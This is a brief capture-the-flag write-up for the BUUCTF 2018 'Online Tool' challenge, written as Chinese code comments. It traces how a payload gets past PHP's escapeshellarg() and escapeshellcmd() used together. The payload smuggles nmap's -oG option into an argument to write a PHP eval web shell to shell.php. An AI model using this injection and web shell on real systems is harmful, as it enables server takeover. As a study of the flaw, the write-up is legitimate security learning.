BUU-[BUUCTF 2018]Online Tool

//escapeshellarg()函数的处理流程, 为单引号转义,并且使用单引号包围;而且会为目标前后添加一对单引号
//' <?php eval($_GET[pass]); -oG shell.php ' 原始payload
//''\'' <?php eval($_GET[pass]); -oG shell.php '\''' 函数处理
//escapeshellcmd($host)函数的处理流程, 为特殊的字符添加\,这里为\添加了一个\
//''\\'' <?php eval($_GET[pass]); -oG shell.php '\\'''
// '' 那么发现是一个空字符, 扔掉
// \\ 就是一个\
// ''又是一个空字符, 扔掉
// <?php eval($_GET[pass]); -oG shell.php 被逃逸了出来
//